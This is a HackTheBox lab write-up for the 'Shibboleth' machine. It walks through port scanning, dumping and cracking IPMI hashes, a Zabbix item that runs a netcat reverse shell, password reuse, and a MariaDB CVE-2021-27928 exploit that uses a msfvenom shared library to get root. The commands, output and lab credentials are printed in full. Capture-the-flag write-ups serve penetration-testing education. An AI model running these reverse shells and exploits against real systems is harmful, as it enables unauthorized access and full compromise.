Shibboleth - [HTB]

Cover Image for Shibboleth - [HTB]

Table of Contents


    Shibboleth is a medium Linux machine from HackTheBox where the attacker will have to enumerate TCP and UDP ports, finding a IPMI service that can be used to retrieve IPMI hashes. Once cracked the hashes the attacker will gain access to the Zabbix platform where can obtain a reverse shell as Zabbix. Finally, the attacker will have to exploit a vulnerability on MariaDB (CVE-2021-27928) becoming root.


    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.053s latency).
    Not shown: 64898 closed ports, 636 filtered ports
    80/tcp open  http
    kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sU -n -T3 -oN AllPortsUDP.txt
    Nmap scan report for
    Host is up (0.18s latency).
    Not shown: 999 closed udp ports (port-unreach)
    623/udp open  asf-rmcp

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 80
    Nmap scan report for
    Host is up (0.051s latency).
    80/tcp open  http    Apache httpd 2.4.41
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Did not follow redirect to http://shibboleth.htb/
    Service Info: Host: shibboleth.htb
    kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sU -sC -sV -p 623 -n -oN PortsDepthUDP.txt
    Starting Nmap 7.92 ( ) at 2021-11-28 14:45 EST
    Nmap scan report for
    Host is up (0.17s latency).
    623/udp open  asf-rmcp
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
    # Nmap done at Sun Nov 28 15:01:34 2021 

    Adding the domain shibboleth.htb to the /etc/hosts file we can access to this web page.

    Web page

    Searching for subdomains with Ffuz we can find the followings.

    kali@kali:~/Documents/HTB/Shibboleth$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -o vhosts.txt -H "Host: FUZZ.shibboleth.htb" -fc 302
    monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
    monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
    zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

    Looking for enumeration methods for the asf-rmcp port. There is a rapid7 post where we can find a Metasploit module for dumping ipmi hashes.

    msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options
    Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
       Name                  Current Setting                             Required  Description
       ----                  ---------------                             --------  -----------
       CRACK_COMMON          true                                        yes       Automatically crack common passwords as they are obtained
       OUTPUT_HASHCAT_FILE                                               no        Save captured password hashes in hashcat format
       OUTPUT_JOHN_FILE                                                  no        Save captured password hashes in john the ripper format
       PASS_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing common passwords for offline cracking, one per line
       RHOSTS                                      yes       The target host(s), see
       RPORT                 623                                         yes       The target port
       SESSION_MAX_ATTEMPTS  5                                           yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
       SESSION_RETRY_DELAY   5                                           yes       Delay between session retries in seconds
       THREADS               1                                           yes       The number of concurrent threads (max one per host)
       USER_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing usernames, one per line
    msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > exploit
    [+] - IPMI - Hash found: Administrator:e390caad02030000d690a68d88f1a6a30475a2b7e55e5cb775c0aa292af9a073aed44f9cf7377248a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e1fc0411bf8eef9cd04f8d792db9f3a37cae7bc5
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    This hash can be cracked using hashcat.

    kali@kali:~/Documents/HTB/Shibboleth$ hashcat -h | grep IPMI
       7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
    kali@kali:~/Documents/HTB/Shibboleth$ hashcat -m 7300 IPMI_hash.txt /usr/share/wordlists/rockyou.txt 

    These credentials can be used for access to the zabbix platform.


    Zabbix allows users to execute commands on an agent, as we can see in this post. Hence, we can obtain a reverse shell.

    For doing so, we need to access Configuration/Hosts/shibboleth.htb/Items, then create a new item with the following command.[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f &,nowait]
    Zabbix RCE

    Finally, we need to return to the Item and click on "Execute now" to execute the command, obtaining a shell as Zabbix.

    $ id
    uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)

    Privilege Escalation 1

    To become ipmi-svc we can reuse the same password.

    zabbix@shibboleth:/tmp$ grep bash /etc/passwd
    zabbix@shibboleth:/tmp$ su - ipmi-svc
    Password: ilovepumkinpie1
    ipmi-svc@shibboleth:~$ id
    uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)
    ipmi-svc@shibboleth:~$ cat user.txt

    Privilege Escalation 2

    Doing some enumeration with linpeas we see that MySql is being executed as the user root.

    root        1137  0.0  0.0   2608  1880 ?        S    17:14   0:00 /bin/sh /usr/bin/mysqld_safe                                                               
    root       16481  1.1  2.9 1741484 118280 ?      Sl   18:43   0:03  _ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-li
    nux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock 

    The credentials for accessing the database can be found at /etc/zabbix/zabbix_server.conf

    ipmi-svc@shibboleth:/etc/zabbix$ ls -la
    total 100
    drwxr-xr-x  4 root     root      4096 Nov  8 11:02 .
    drwxr-xr-x 96 root     root      4096 Nov  8 11:02 ..
    -r--------  1 zabbix   zabbix      33 Apr 24  2021 peeesskay.psk
    drwxr-xr-x  2 www-data root      4096 Apr 27  2021 web
    -rw-r--r--  1 root     root     15317 May 25  2021 zabbix_agentd.conf
    -rw-r--r--  1 root     root     15574 Oct 18 09:24 zabbix_agentd.conf.dpkg-dist
    drwxr-xr-x  2 root     root      4096 Apr 27  2021 zabbix_agentd.d
    -rw-r-----  1 root     ipmi-svc 21863 Apr 24  2021 zabbix_server.conf
    -rw-r-----  1 root     ipmi-svc 22306 Oct 18 09:24 zabbix_server.conf.dpkg-dist
    ipmi-svc@shibboleth:/etc/zabbix$ grep -Ev ^\#\|^$ zabbix_server.conf

    Furthermore, the MariaDB version is associated with a PoC on GitHub.

    ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -pbloooarskybluh
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 331
    Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    MariaDB [(none)]> 

    In order to exploit it, you need to execute the following commands, getting a shell as root.

    kali@kali:/tmp$ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4445 -f elf-so -o
    kali@kali:/tmp$ python -m SimpleHTTPServer 
    kali@kali:/tmp$ nc -lnvp 4455
    ipmi-svc@shibboleth:/tmp$ wget
    ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/";'
    ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query
    kali@kali:~/Documents/HTB/Shibboleth$ nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [] from (UNKNOWN) [] 41216
    uid=0(root) gid=0(root) groups=0(root)
    cat /root/root.txt